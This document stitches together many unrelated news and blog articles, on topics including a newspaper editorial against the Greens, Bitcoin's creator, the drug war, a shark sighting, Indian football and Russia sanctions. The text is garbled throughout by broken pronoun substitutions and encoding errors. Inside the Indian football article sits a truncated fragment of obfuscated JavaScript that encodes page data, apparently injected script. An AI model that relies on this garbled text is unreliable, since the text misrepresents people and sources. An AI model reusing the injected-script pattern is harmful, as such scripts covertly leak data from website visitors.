Until today, I'd never seen a national broadsheet with pretensions to fair and balanced reporting actually admit that it wasn't just biased against a party supported by 14% of the country, it wanted to “destroy” it. But that's just what The Australian did in its editorial today: Greens leader Bob Brown has accused The Australian […]
Until today, I'd never seen a national broadsheet with pretensions to fair and balanced reporting actually admit that it wasn't just biased against a party supported by 14% of the country, it wanted to “destroy” it. But that's just what The Australian did in its editorial today:
Greens leader Bob Brown has accused The Australian of trying to wreck the alliance between the Greens and Labor. We wear Senator Brown's criticism with pride. We believe they and their Green colleagues are hypocrites; that they are bad for the nation; and that they should be destroyed at the ballot box. The Greens voted against Mr Rudd's emissions trading scheme because they wanted a tougher regime, then used the lack of action on climate change to damage Labor at the election. Their flakey economics should have no place in the national debate.
Well, there you are. You can take pretty much everything The Australian says about the Greens in that context: they are not interested in giving them a fair hearing, or listening to what they have to say, or presenting their arguments for public assessment: they want them “destroyed”.
Everything you read about The Greens in that paper can now be almost completely discounted by that fact. You can only conclude that if there's a smear, they'll run it. If there's a positive story, they won't. If there's a way of presenting the Greens' policies in the most damaging, least accurate light, that's how they'll be presented. The Greens will not be given fair opportunity to respond to critics' claims about them (including the asinine ones made in that editorial). It will be relentless, one-sided, hostile propaganda.
Anyone who seeks to rely on The Australian for information should be aware that whatever they're told about the Greens will be subject to the most extraordinary, deliberate bias, with the express purpose of having them “destroyed at the ballot box”.
I know it's hardly news that Hardly News has an axe to grind against the left in general and the Greens in particular: but this admission, this defiant declaration today is extraordinary. They genuinely think the right so victorious that they can without commercial consequence announce their utter contempt for anyone who believes otherwise. Screw you, progressives who believe in public services, civil liberties, a social democratic Australia. You're the fringe, and the country's biggest media empire is working to make sure you are no longer represented in parliament.
This is The Australian openly eschewing reporting for advocacy; nearing the completion of its transition into the Fox News of Australian media.
UPDATE: Maybe the Australian‘s editors are right: maybe their readers won't in any way be concerned about being openly led around by the nose. After all, many of them voted Liberal even after Tony told them that you couldn't believe what they said – something they bizarrely cheered as being “refreshing honesty”. Maybe they will, without irony, applaud the Australian promising to dedicate its reporting about the Greens to telling them what they already – because they believe what the Australian tells them about the Greens – believe about the Greens.
(Via reader Wayne.)
(Visited 393 times, 1 visits today)
Five bunnies, rising two-stories tall, lit white from inside. Beginning Thursday, these giant critters will be lounging around The Lawn on D, the outdoor event space at 420 D St. in Boston, next to the Boston Convention & Exhibition Center.
“I like people have a sense of awe and wonder when they first approach the work,” says Amanda Parer, the 44-year-old Australian artist in town this week to keep an eye on the latest adventure of their monumental, inflatable rabbits.
“Intrude,” as the bunnies are known, is available for visits for free from 5 to 9 p.m. Thursday, July 9; from noon to 10 p.m. Friday and Saturday, July 10 and 11; and from noon to 8 p.m. Sunday, July 12. (The sculptures are taken down each night.)
“Intrude" by artist Amanda Parer. (Courtesy)
At first glance, these rabbits appear wicked cute. But their size can strike an ominous undertone. Which is what Parer is hinting at with the title. They're like the animals of fables—with morals at the ends of the tales.
“These are animals we remember from childhood stories,” Parer says. “I use them as a hook to get people in. Hopefully, they'll dig a little deeper.”
Specifically, in this case, they explain, “The rabbit was introduced [to Australia] by the first white settlers in 1798,” shipped in from England. “They brought species like the rabbits as a food source and for sport. … We've been trying to eradicate them basically without any success at all.”
“Intrude” they say, is “about us, Westerners, Europeans, coming to Australia and dramatically changing the space. Not only bringing introduced species, but also having a dire effect on the indigenous peoples there. As a culture, we haven't come to terms with that.”
Previously Parer had mainly been active as a painter, creating scenes of giant rabbits or deer lumbering across Australian fields. Sometimes the animals turned translucent, like ghosts. They began creating sculptural and installation works, like groups of foot-long ceramic rabbits painted with images of extinct flowers or barren landscapes from 2011.
Then last year, Parer had a hit when they went huge, hiring people to stitch together giant rabbits to their specifications. “Intrude” debuted at 2014 Vivid Sydney, billed as a “festival of light, music and ideas,” and has traveled to Belgium, France, England, Italy, Canada and now Boston.
“Environmental art can be pretty soapboxy,” Parer says. “I like to use humor and beauty in messages.”
Greg Cook is co-founder of WBUR's ARTery. Follow them on Twitter @AestheticResear or on the Facebook.
Oh, for the love of [insert preferred deity here] ... just when you thought it was impossible for the Republican Party to careen even further to the right, we now have a gubernatorial candidate in Alabama who is fighting back against the charge that they believe in science.
After an ad appeared that said, "on the school board, Byrne supported teaching evolution, said evolution best explains the origin of life," Bradley Byrne howled:
As a Christian and as a public servant, I have never wavered in my belief that this world and everything in it is a masterpiece created by the hands of God. As a member of the Alabama Board of Education, the record clearly shows that I fought to ensure the teaching of creationism in our school textbooks. Those who attack me have distorted, twisted and misrepresented my comments and are spewing utter lies to the people of this state.
Here's a thought ... if Byrne is right and "this world and everything in it is a masterpiece created by the hands of God," wouldn't that mean God created the theory of evolution?
Seriously, it's a party gone mad ... the mere suggestion that Byrne supported teaching a theory that's been kicked around since the 6th century is a twisted distortion and an utter lie. The crazy bar just keeps getting raised higher and higher.
SHARE THIS POST: Facebook
Twitter
Google+
Pinterest
This gets a bit deep, so bear with me.
A few nights ago, my wife and I were discussing plans for my upcoming birthday in April, which evolved into a conversation about previous birthday parties. I mentioned that I had fond memories of certain parties that seemed to have stuck in my head much clearer than others. One in particular that stood out was my fifth birthday party, when I received my He-Man Big Wheel.
I remember it very clearly. I can see myself receive the present, I can see my family and friends smiling, and I can see the reaction on my face and everything. What a happy memory to have!
Wait a minute… I can see myself?
I asked my wife to think of a really strong memory from their childhood. They remember being very young and sitting on the swing set at their childhood home. Then I asked if the memory is in first person or can they see herself, in third person. They realize that they can see themselves in the memory. Then I ask the question.
‘If this is YOUR memory, then why can you see yourself? Shouldn't the memory be in the first person?'
Them head exploded. Not really, but it definitely blew their mind. How could their brain hold a memory from the perspective of a non-existent camera angle?
I did a bunch of research the following day. It turns out that the first person / third person memory phenomenon is well documented.
There are two types of autobiographical memories, Field and Observer. Field memories are ones that you can remember from the first-person perspective, and are typically ones that involve a large amount of physical or psychological feelings. Observer memories are from a third person view, are mostly older memories, and typically not as vivid. Some research shows that focusing deeply on an observer memory may trigger a conversion to a field memory, providing more detail.
So, now that we know there are two distinct types of memories, let me ask my question again. How can a memory exist from an angle where I can see myself?
It turns out, the human brain is a fantastic machine. It can construct a complete memory, from any angle, with the littlest of data. Your brain can recreate a moment in your life from a completely independent perspective than you originally perceived it. It takes the sounds, smells, and emotional data that you captured from your perspective, and like the ultimate point cloud, reconstructs the scene for consumption from another angle.
Some people claim that seeing photos and videos from past events can influence the way you remember things. This is very true. In fact, photos and videos can cause some brains to create false memories, which is even more amazing.
There is a large group of people who say that 360 images and video is not true VR. I wonder if the growing popularity of this content has something to do with our brains' built-in ability to appreciate and understand this format. The VR/AR industry is trying desperately to find the ultimate 3D/360 capture method, using arrays of cameras, photogrammetry, video stitching, and light fields, but still hasn't mastered it. The human brain figured it out thousands of years ago.
What have I learned from this?
My brain is the most powerful piece of tech in my possession. I am in constant awe of it's capabilities. We can learn a lot from our brains, and how memories are formed. Someday, VR content will be so real that our brain will accept it as a true memory. To take it even further, it's possible that someday we will be able to download our memories and share them with others via an HMD.
Woah…
Update: The man Newsweek claims to have been the creator of Bitcoin has now denied having anything to do with the digital currency in an interview with the Associated Press. I've changed the headline of this post to better reflect that the Newsweek account is unconfirmed. My original, unedited post follows.
It's been nearly three years since anyone involved with Bitcoin heard from Satoshi Nakamoto, the inventor of the cryptocurrency that has created fortunes and changed lives. Now it seems that Nakamoto has finally been revealed. And many in the Bitcoin community would rather that the godfather of digital money had remained a cipher.
On Thursday morning, Newsweek published its exposé on Nakamoto, a two-month investigation that led to Nakamoto's home near San Bernadino, California. Dorian Prentice Satoshi Nakamoto, if indeed they are Bitcoin's creator as plenty of evidence indicates, is a 64-year-old Japanese-American man with libertarian leanings, a background in classified military engineering, and a love of model trains. There's little sign that he's spent the hundreds of millions of dollars worth of digital cash that they likely controls based on analyses of Bitcoin's transaction history; They live in a modest home and drives a Toyota Corolla.
But for many in the Bitcoin community, even those who have been obsessed with Nakamoto for years, those details may not have been worth violating the privacy of a very private person. "If someone was telling you they don't want to be known, and you report a story about that person's life and put up a picture of them and their home, that's a bit f--ked up," says Michael Goldstein, creator of the Satoshi Nakamoto Institute, a website that catalogs Nakamoto's writings along with other Bitcoin-related papers. They still doubt the article's findings, but argues that it's shamefully invasive of Nakamoto's solitude if it is true. "I find it upsetting."
On Bitcoin Talk, the main web forum that hosts the cryptocurrency community's conversation, reactions began with denial. "What is this fake crap," wrote one of the first commenters. "Unless they can do a signed transaction from an address known to be that of the originator of Bitcoin, then I don't believe, sorry," wrote another user, referring to a cryptographic trick that would prove someone held the private Bitcoin keys known to be held by Nakamoto.
Soon, the conversation shifted to anger. "Way to reward our liberator. Irresponsible," wrote Amir Taaki, a well-known Bitcoin developer. "Really immature journalism at best. A mistake that might cost someone their life at worst," added another commenter.
Criticism of Newsweek's article, which describes a silent standoff as reporter Leah McGrath Goodman's stood at the end of Nakamoto's driveway and was questioned by police, focused in particular on Goodman's decision to name Nakamoto's family members and to publish a picture of their house. Mikko Hypponen, a security researcher for antivirus firm F-Secure, showed that they were quickly able to determine the address of the house and posted a picture of it from Google Maps Streetview. "This is so bad for Mr. Nakamoto," they wrote on Twitter. "It's trivial to find their home address on the net."
Gavin Andresen, chief scientist for the Bitcoin foundation, wrote that after reading Newsweek's piece they wished they hadn't allowed themselves to be interviewed for the article. "I'm disappointed Newsweek decided to dox the Nakamoto family," they wrote on Twitter, using the Internet jargon "dox" to refer to revealing identifying details on someone, "and regret talking to Leah."
On Reddit's subforum devoted to Bitcoin, however, a user with a throw-away account responded to the article by posting a note of gratitude to Nakamoto: "Just want to take this chance to thank them for what they have done," wrote ThankYouSatoshi, Calling the revelation of more details of their life's work "a true inspiration to me."
If nothing else, Nakamoto's unmasking does start to answer questions about the political motivations behind Bitcoin. Newsweek's story quotes Nakamoto's daughter describing them as a libertarian who is "very wary of the government, taxes and people in charge." In another part of the story, they describe playing a game with their father in which they would pretend "government agencies" were coming after her, and they would hide in the closet.
"It sounds like they were a libertarian and had a huge distrust of the government," says the Nakamoto Institute's Goldstein, an anarcho-capitalist himself, and one who has argued for years that the politicial intentions of Bitcoin's creator had been to limit government control of money. They see that revelation of Nakamoto's similar outlook as validation. "Told you so."
But Goldstein argues that Nakamoto's personal life and political opinions have little to do with Bitcoin's current functioning. Bitcoin's code, after all, has been almost entirely rewritten since Nakamoto published the first implementation of it.
In fact, Goldstein says they wish that the namesake of their Institute had remained in obscurity, leaving the world to focus on the code, rather than the person who wrote it. "It's less mythological this way," Goldstein says. "I've always wanted to know about Satoshi only because it tells us about Bitcoin itself...when the person is known, it makes it more difficult to explain why it doesn't matter who the person is."
–
Follow me on Twitter , email me, anonymously send me sensitive documents or tips , and check out the new paperback edition of my book, This Machine Kills Secrets: Julian Assange, the Cypherpunks, and Their Fight to Empower Whistleblowers.
Russian President Vladimir Putin endorsed cryptocurrency and Bitcoin rival, Ethereum, earlier this year. What does this mean for the future of the Russian technology industry and fintech in the long term? Is Russia one-step ahead with Burger King's WhopperCoin? With geopolitics being at the forefront of everything Russia does and those experimenting with cryptocurrencies still in doubt and insecure, Putin's interest was treated with caution.
Just yesterday, Russian state-owned development bank Vnesheconombank (VEB) and other government ministries unveiled a blockchain research center to be headquartered at the National University of Science and Technology in Moscow, as part of a digital initiative led by Putin. VEB chief Sergei Gorkov highlighted that this would lead to the development of blockchain with ‘a group of investment funds with external financing from both Russian and foreign investors,' Gorkov said.
Alexander Dunaev, COO at emerging markets fintech company ID Finance, said that the Russian government is recognizing the change in financial services caused by technological disruption. ‘The last time the world saw such an unprecedented change was in the second half of the 20th century with the adoption of personal computers - which Russia missed due to geopolitical isolation. There is a lot of will to avoid this pitfall in the future.'
‘The Central Bank supports the changes enthusiastically. We see this in the creation of a legal framework to embrace fintech – we can draw attention to the liberalization of remote identification rules and general infrastructure sponsoring. It will be helpful to keep building on top of the current momentum with the adoption of the PSD2 rules to liberalize access to data,' Dunaev said.
It could be said that Putin's endorsement of Ethereum, the more tried and tested of the blockchain cryptocurrencies, came after being left behind as Dunaev mentioned. However, again, there is a lot of concern surrounding the growth of blockchain because of Bitcoin's association with money laundering. ‘The Russian judiciary treats bitcoins as the so-called money surrogates which have previously been linked with fraudulent pyramid schemes and are now illegal for both companies and private individuals,' Dunaev said.
According to Bloomberg, Putin was attracted to Ethereum as a ‘potential tool to help Russia diversify its economy beyond oil and gas'. After meeting Ethereum founder Vitalik Buterin, Putin said that ‘the digital economy isn't a separate industry, it's essentially the foundation for creating brand-new business models,' - critical after Russia's recession. Vlad Martynov, adviser for nonprofit organization The Ethereum Foundation, compared blockchain to the internet.
‘Blockchain may have the same effect on businesses that the emergence on the internet once had - it would change business models, and eliminate intermediaries such as escrow agents and clerks. If Russia implements it first, it will gain similar advantages to those the Western countries did at the start of the internet age,' Martynov said. This attitude has led to a boom of a different kind this year in Russia, according to Dunaev.
‘The rapid ascent of various cryptocurrency prices since the beginning of 2017 attracted so much attention that Russia saw a drought in graphics cards used for mining. Blockchain started being associated with ‘get rich quick' schemes. The recent boom in initial coin offerings (ICOs) in Russia may pose a secular threat to blockchain adoption as the unregulated nature of these securities will inevitably result in unscrupulous companies and individuals taking advantage of the speculative hype. There is not a shadow of a doubt that among a number of promising projects issuing tokens, an even greater number are indeed a new form of Ponzi schemes,' - so, Putin may be going with the safer and more secure option with Ethereum.
Technology that is fully unhackable does not exist. Michael Jackson, a partner at early-stage venture firm Mangrove Capital Partners and board advisor to digital assets software firm Blockchain, highlighted that at present, all major payment systems in use in Russia are under the control of foreign entities. ‘That is not desirable for any sovereign state, especially one as proud as Russia. Putin wants to bring them under state control which is completely understandable. Hack proof technology is desirable for everyone but blockchain technology helps define the ultimate truth as to whether a document exists, what it contains and when it was created. This prevents 'retrospective' modifications and is a clear part of a fight against corruption,' Jackson said.
As Dunaev states, Putin's endorsement of Ethereum means that ‘blockchain is no longer a bogeyman. It is more important for the attitude of the judiciary, which interprets and applies the law of Russia, than industrial applications. It will also drive the development of the government cryptography standard by security services, enabling future government use.' Jackson said that while digital currencies are here to stay, Russia having a plan is a strong statement. ‘That said, Ethereum is new and it seems unwise to commit exclusively to one version just now. I would expect to see various trials and certainly a significant change or fork in Ethereum following these. It's difficult to imagine it's perfect.'
Maybe you've heard rumors, or even caught a glimpse.
An elusive life-sized Scooby-Doo Mystery Machine is sometimes seen cruising around the Seattle area, or so the story goes. Where's Scooby-Doo when you need him?
The psychedelic van, it turns out, belongs to Michael Yates, a 57-year-old self-claimed kid and a longtime fan of Scooby-Doo. Yates says they bought the van from its original painter four years ago for just $800.
“I was just looking for a van to haul stuff around with. And it was just, oh, score! I like that,” they said, adding they soon realized the iconic van has demands of its own.
“The very first day I got it, just trying to get out of Fremont, I stopped for gas, a crowd gathered. I stopped at the store, a crowd gathered. Everywhere we went that first day, I mean, (drivers) honking and waving, and people everywhere,” they said. “Five miles later, (I thought,) ‘This is insanity!'”
Yates has since learned not to drive the van when he's in a rush.
“I can't take it to Fred Meyer, for example, without people stopping and taking pictures of their kids in front of it,” they said.
And anyway, says Yates, the 37-year-old Dodge van can only go so fast: “(Tops out at) 65—tops. Downhill.”
The Mystery Machine “makes a ruckus” on the freeway, and gets only 14 miles per gallon, says Yates. But the way they feel when he's at the wheel, they say, is priceless.
“Just to go out and have fun with? That's a whole other game. Sometimes you just forget how fun it can be. Just by watching the reaction of the people, you think, ‘Oh, that's right. This is what it's all about,”' they said. “When I'm driving that (van), I'm a kid.”
And they suspect that nostalgic joy is what draws so many others—“people my age to older, all the way down to 5-year-olds”—to the Mystery Machine.
“More than anything else, it's a break from the real world. And it goes back to something that's simpler … There wasn't a lot of gray to the Scooby world. And I think people yearn for that sort of thing.
“It's the mindset of the people. Seattleites have a tendency to be a little more laid back, a little more open about things. They're not hung up on who they are; they're more open to reliving childhood things and experiencing new things. And that's just one of the things I love about in Seattle,” they said.
The concept of a novelty car isn't entirely new to the Tacoma native. In high school, they were known to wear a long black coat and a white top hat, and drive around a white 1966 Oldsmobile hearse.
“Some things have not changed,” they said.
Still, over the years, the Mystery Machine has brought Yates several surprises.
“It's the one vehicle I've been flashed because of,” they said, adding their other encounters have proven much tamer. People often leave notes on their windshield with quotes from the show. Sometimes they leave more.
“There was a brand-new (stuffed-animal) Scooby hanging from the side-view mirror. Some random stranger went, ‘He should have this!' and stuck it on the van. And it happens all the time,” they said.
Yates wants to add their own touch to the van this summer.
“Want to do a purple shag in the inside with a big, round white shag in the middle,” they said.
They plan to drive the van until it dies. The Mystery Machine, they say, is just one part of their plan to never grow old.
“I know too many people that are my age that are incredibly boring people—and I don't mean that in a bad way. They're settled into being…middle-aged, and I find that to be intensely boring,” they said. “I have to deal with reality five days a week. The rest of the time—not gonna happen. I refuse to grow up, or old.”
The Root: Why Won't Obama End The War On Drugs?
Enlarge this image toggle caption Stan Honda/AFP/Getty Images Stan Honda/AFP/Getty Images
John McWhorter is a regular contributor to The Root.
The Obama administration's deafness to the growing chorus of opposition to the senseless war on drugs has become so appalling that you almost start thinking Cornel West was right. About Obama's supposed lack of interest in black concerns, that is.
I know that's not actually the problem: the president has to prioritize. With the economy such as it is, and the three wars we are waging abroad, such as they are, it's not surprising that Obama has not taken on the politically fraught task of truly ending the New Prohibition.
I have written that Obama should get to the war on drugs in their second term. But that was two years ago; now there are preliminaries, positions, possibilities to be investigated. So far Obama refuses to make even a pretense.
It's gotten this bad: On Tuesday, representatives of Law Enforcement Against Prohibition sought a hearing with Obama's drug czar, Gil Kerlikowske, who has refused repeated requests for even a simple sit-down. LEAP includes officers, judges, prosecutors, agents and military officers united in the conclusion that the war on drugs has been a failure, and all they wanted was to put in Kerlikowske's hands their new report on the issue.
Kerlikowske wouldn't even appear, instead sending down a skittish aide. Just look at how the encounter played out in this photo, of LEAP's executive director, Neill Franklin, on the left, with the aide in question. Serious people with a serious concern seek a bit of face time with the administration devoted to change we can believe in, and they get treated as if they're a bunch of 11-year-olds agitating for one more Harry Potter movie.
Kerlikowske has actually claimed that the Obama administration has ended the war on drugs — but what they mean is that they have decided not to call it that. This is mere semantics of the "it depends on what 'is' is" kind. Obama has said, "We have to think more about drugs as a public health problem," but under their watch, punishment for drug possession and use has been funded more highly, while funds for treatment under the Department of Education have been slashed by a third.
It gets worse. Drug arrests during Obama's first year in office were higher than they were in George Bush's first year. There have been about 100 marijuana raids under the Obama administration so far, while during all eight of the Bush years, there were only about 200.
If there is any through line from Obama's speech at Chicago's Grant Park to this, I'm having trouble gleaning it. The Obama folks are so grievously behind the curve on the war on drugs that their approach will look as tacky and antique in the history books as Herbert Hoover's support for Prohibition as "an experiment noble in purpose."
Sixty-seven percent of our nation's police chiefs consider the war on drugs a failure. The Global Commission on Drug Policy declared the same thing, and we assume that folks like Kofi Annan, George Schultz and Paul Volcker must be on to something.
In response to them, the Obama folks trotted out statistics showing that drug use has declined some since the 1970s. How nice — but at what cost? Surely Obama, Kerlikowske and Attorney General Eric Holder don't think that the massive uptick in incarceration, the hideous disproportion of black men subjected to it and the destruction of black communities in the wake of that incarceration rate have been a mere matter of the eggs one must crack to make an omelet.
Truly — they simply cannot think this, and do not. Yet Holder, when asked recently whether they thought ending the war on drugs would cut down on the deaths of police officers, mumbled, "I don't think that's right ... " and walked away (watch that one here). This willful lack of attention to such an urgent problem is one of the few ways in which the Obama administration seems callous at this point.
Not to mention, just plain fake: The Hoo-bama analogy goes further. Hoover privately liked a postwork drink and had previously cultivated a wine cellar; meanwhile, LEAP's report properly notes, "The Obama administration, like at least the two that preceded it, is led by people who used illicit drugs and went on to have productive lives. It is a source of great shame that none of these presidents took real steps to end a policy, which, if fairly administered, would likely have prevented them from entering politics in the first place."
Put it this way: Obama could get people like West off their back and be a meaningfully pro-black president — not to mention a bracingly pro-human one — by addressing the war on drugs for real. No more lip service, such as Holder's dutifully hoping for another season of The Wire, despite their apparent lack of interest in actually putting to use the show's lessons about the drug war. The Wire's creator David Simon hit the bullseye in saying that they and co-creator Ed Burns would be happy to launch a new Wire season if the Obama administration would get real about the war on drugs.
We should let President Obama know that the time has come, in large numbers. Over the past week, more than 2,500 people have sent letters to them about the drug war through LEAP's website (you can, too, right here). As the LEAP report notes, "Our President is chasing change. They need to catch up."
Living, surviving, and thriving off the grid presupposes that you are, indeed, living, surviving, and thriving. It's tough to do those things when you're dying from an infection you got from a simple cut. It's easy to understand, then, that the people who will do the most surviving will be the ones with the best access to first aid. When you're on your own, however, or you're the only adult in the room, applying first aid to your own injuries might be more easily said than done. That's where designer Gabriele Meldaikyte comes in.
Gabriele's first aid kit is unique in that it was designed to be used with only one hand, making treatment of your own injuries infinitely easier than traditional first aid kits.
This “design concept” first aid kit can be opened easily with one hand …
… once the first aid kit is open, it unwraps like a tool roll to give you easy access to antibacterial wipes, bandages, gauze, and more …
… which may not seem as awesome a survival tool as a camouflaged hunting bike or a head-splitting zombie axe, but it's tough to enjoy the awesome parts of living off the grid when you're not living. You know?
You can check out a few more photos of Ms. Meldaikyte's innovative one-handed medical kit, below. If you think this as brilliant an idea as I do, leave some comments, below, and we'll try to get a petition going to have the Red Cross make a few thousand or get it up on Kickstarter or something. Who knows? We might save a few lives.
Source | Photos: Gabriele Meldaikyte, via Core 77.
Story highlights More than 1,000 people evacuated from beach during great white sighting
State trooper said it's an unusual location for a shark to be seen
More than 1,000 people were pulled out of the water and off the beach Monday after a great white shark was spotted off the coast of Duxbury, Massachusetts.
The shark, seen from a Massachusetts State Police helicopter, was about 75 yards from the beach. State police immediately notified the Duxbury Police and Duxbury harbormaster, according to the state police.
"It is rather infrequent for us to see a shark within 75 yards in that area," said state Trooper Dustin Fitch.
Massachusetts Marine Fisheries confirmed the shark to be a great white, approximately 14 feet in length.
A 12-14 foot great white shark was spotted off the coast of Duxbury, Massachusetts. State Police temporarily closed the beach to swimmers.
State police watched the shark from above while boats from the U.S. Coast Guard, Duxbury harbormaster, Plymouth harbormaster and Marshfield harbormaster scouted the area to make sure there were no more sharks in the water.
Steve Cameron, Duxbury's assistant harbormaster, said it was an unusual sighting since the sharks are usually on the outer cape and not on the inside.
As the harbormaster boats were approaching the area, the shark swam southeast into deeper water, Fitch said.
The beach was later reopened and no injuries were reported.
The Indian Super League (ISL) received a positive boost as winners will now get to play in the AFC Cup.
Following the India Football Federationa��s (AIFF) Executive Committee Meeting on Thursday in Mumbai; where its President Praful Patel batted for the ISL and the I-League to runA�simultaneously. AFC Cup Playoff slotA�would now goA�to the winner of the ISL.
Asian Football Confederation (AFC) had asked the AIFF to decide on the league structure at least for the coming season as soon as possible.A�”There was nothing in pen and paper but verbally the idea was taken on board by the President,” an AIFF official present during the executive committee meeting.
Legitimacy for ISL
This means that the ISL is no more a private tournament; but a recognised league under the aegis of the India Football Federation (AIFF), AFC and FIFA. AFC stated that a long-term roadmap for Indian football shall be ready by the end of October this year.
“The ISL is expected to have more teams and therefore it won't be possible to have both I-League and ISL going on separately. Indian national team will also have their AFC Asian Cup qualifiers; and then India will play the SAFF Championship in May. There is little option but to do the leagues together. Details are yet to be chalked out but will have to be done soon;” another AIFF official informed on the condition of anonymity.
It was learnt that the AIFF had been asked to go for this short-term solution by IMG-R; their commercial and marketing partners.
Further, Praful Patel has urged clubs to meet them on Saturday in New Delhi.
Kolkata clubs East Bengal and Mohun Bagan are keenly interested in the meeting as their fate still hangs in the balance. The pair have maintained that they would not pay a franchise fee of Rs 15 crore; and would want money from the central pool.
Indian Super League (ISL) will announce its two new franchises before India's AFC Asian Cup qualifier against Kyrgyzstan on June 13th. RIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
NBC 7's Marianne Kushi reports on the proposed legislation that would offer tax credit for up to $2,000 a year for pet owners who have to pay for emergency vet bills.
Most people would do just about anything to protect or care for their pets, including spending thousands of dollars on veterinary care.
“People talk about it all the time. Even just taking your dog to the vet is $50,” said San Diegan Jaimie Bougie. “Even if nothing is wrong, it can get expensive.”
Bougie owns two pugs, a breed known to suffer complications with the spine. A few years ago, their 14-year-old pug racked up a $10,000 vet bill.
“She had a spinal disorder that's common in pug, that leaves their spine unstable. So it was causing them to have issues with their back legs,” Bougie said.
Bougie spent thousands to pay for MRI's and eventually spinal surgery.
Proposed legislation in the California Assembly would give dog and cat owners the option of a tax credit for half of “medically necessary” vet bills, totaling up to $2,000 per year. The bills would need to be submitted from a state certified veterinarian to qualify.
Patricia Ungar, DVM runs Kensington Veterinary Hospital. Ungar said they often see how finances play a role in life or death decisions involving a beloved pet.
It can be heartbreaking for them and their staff as well as the family.
“I think the idea of being able to have some assistance, if the state can figure out the financial side of it, I think it's a great idea,” Ungar said.
AB 942 would allow the tax credit beginning in 2017 until 2023 for those charges not covered by pet insurance. They could include vaccinations, annual checkups, surgeries, and drug prescriptions.
The idea of such a tax credit is not supported by the California Tax Reform Association.
San Diego CPA Thor Eakes explained, “I would imagine off the top of my head half of the households in the state has dogs and cats. that would be a very large expenditure by the state.”
The bill was referred to a second debate in committee in order to determine if it will make its way to the full Assembly for a vote.
The Bank of Moscow was one of the Russian banks hit by new sanctions on July 29. (Photo11: Ivan Sekretarev, AP)
WASHINGTON — By the time President Obama stepped to a lectern on the South Lawn of the White House to announce new sanctions against Russia on Tuesday, the sanctions had technically been in effect for more than an hour.
A page on the Treasury Department website was quietly updated at 2:33 p.m., and an e-mail announcement went out at 3:08 p.m. So when Obama told the world about the new sanctions at 3:39 p.m., U.S. banks were already updating their internal compliance systems — or should have been.
But while updating the list of Russian banks and companies on the Treasury sanctions list takes minutes, the new rounds of sanctions by the Obama administration and its European allies are more complicated to comply with than any other sanctions in recent history, experts say.
That's for three reasons. First, the United States has escalated the sanctions three times since March. Second, the Treasury has introduced a new breed of economic sanction, prohibiting specified Russian banks from issuing long-term debt but allowing debt less than 90 days. And third, the interdependence of the U.S. and Russian economies means there's more activity subject to sanctions.
Also immediately after each new round of sanctions, banks and companies that do business with Russia had questions. What kinds of loans are prohibited? What if we've signed a contract? What if we already shipped the goods?
Treasury's Office of Foreign Asset Control operates a hotline to field those kinds of questions from banks, exporters and lawyers. It gets more than 100,000 calls a year.
"As the sanctions get stronger and harder and more targeted, it's harder to understand what they even mean," said Michael Burton, a Washington lawyer who co-chairs the American Bar Association's sanctions law committee. While a general embargo against Cuba or North Korea is easy for everyone to understand, sanctions against individuals, companies or even industries can be more ambiguous.
"These sanctions against Russia are much more narrow — and for legitimate policy reasons, much more gerrymandered," Burton said.
Even the smallest word choices in the sanctions can affect million-dollar deals. The executive order authorizing the sanctions in March applied to new debt or equities issued "of" Russian companies. The sanctions announced July 16 spoke of debt "for" those companies, and Tuesday's sanctions went back to "of."
What's in a preposition? Clif Burns, an attorney with Bryan Cave, said they would interpret "of" to mean transactions in both directions, whereas "for" would prohibit borrowing by the Russian company.
"Everybody thinks they mean equity issued by, and loans issued to, those entities. But it doesn't say that," Burns said. "The press releases, which aren't really binding as interpretation, just confuse matters."
The unpredictability of sanctions can also take businesses by surprise. Treasury and the White House often give less than an hour's notice that an announcement is coming and never disclose the extent of the sanctions until they're announced. Doing so would only facilitate evasion, administration officials say.
"Sometimes these announcements come very late in the day," said Renee Latour, a sanctions lawyer with Greenberg Traurig. "How do you make sure you don't process a transaction the next morning that became prohibited overnight?"
In that fog of confusion, some companies don't even find out they violated sanctions until much later. "A lot of sanctions violations are wholly inadvertent," Latour said.
Follow @gregorykorte on Twitter.
Read or Share this story: http://usat.ly/1rQZ8NZ
A woman is suing the city of Chicopee, Massachusetts, for $1 million over a 2013 assault by an officer that was caught on surveillance camera inside the station.
The video shot inside the Chicopee Police Department on Feb. 13, 2013 shows an officer putting their hands around Maylene Maldonado's throat and then dragging them to the ground.
Maldonado says in their lawsuit, which also names eight former and current police officers, that police put them in an unnecessary chokehold.
Police deny that and say they were "spewing blood and saliva" at the officer and they were just trying to keep them from harming themselves or anyone else.
The officer seen with their hand around Maldonado's throat was charged with assault and has since retired.
Maldonado allegedly assaulted one of the officers before arriving at the station that day. They have been charged with assault and battery of a police officer.
The incident remains under investigation.
A women's bantamweight fight between highly ranked contenders Julianna Pena and Jessica Eye has been added to UFC 192 on Oct. 3 in Houston.
UFC officials confirmed the 135-pound bout to ESPN.com on Tuesday. The pay-per-view event will take place at Toyota Center.
A former winner of The Ultimate Fighter reality series, Pena (6-2) is 2-0 in the UFC. A devastating knee injury sidelined them for all of 2014, but they looked terrific in their first fight back in April, knocking out Milana Dudieva at 3:59 of the first round.
A Washington native, Pena, 25, was the first female pick on TUF 18. They recorded three consecutive finishes on the show, including a first-round TKO over Jessica Rakoczy in the TUF 18 Finale in November 2013.
Eye (11-3) looks to make a quick turnaround after suffering a unanimous decision loss to Miesha Tate in a No. 1 contender bout last month in Chicago. The loss dropped Eye's official UFC record to 1-2.
Fighting out of Cleveland, Ohio, Eye entered the UFC on a seven-fight winning streak. They defeated Sarah Kaufman in their UFC debut in October 2013, but the result was later changed to a no-contest when Eye tested positive for marijuana metabolites.
A light heavyweight title fight between Daniel Cormier (16-1) and Alexander Gustafsson (16-3) is currently scheduled to headline UFC 192.
Source: Xinhua| 2017-11-17 15:55:28|Editor: Yurou
Video Player Close
SEOUL, Nov. 17 (Xinhua) -- South Korea's exports topped 500 billion U.S. dollars at the fastest pace in the country's history, a government report showed Friday.
According to preliminary data jointly compiled by the Ministry of Trade, Industry and Energy and the Korea Customs Service, the country's exports reached 501.2 billion dollars as of 2:00 p.m. local time (0600 GMT) Friday.
The overseas shipment exceeded the 500-billion-dollar mark at the fastest pace since the data began to be compiled in 1956.
Imports amounted to 416.6 billion dollars, raising possibility for the country's trade to surpass 1 trillion dollars this year, the ministry said.
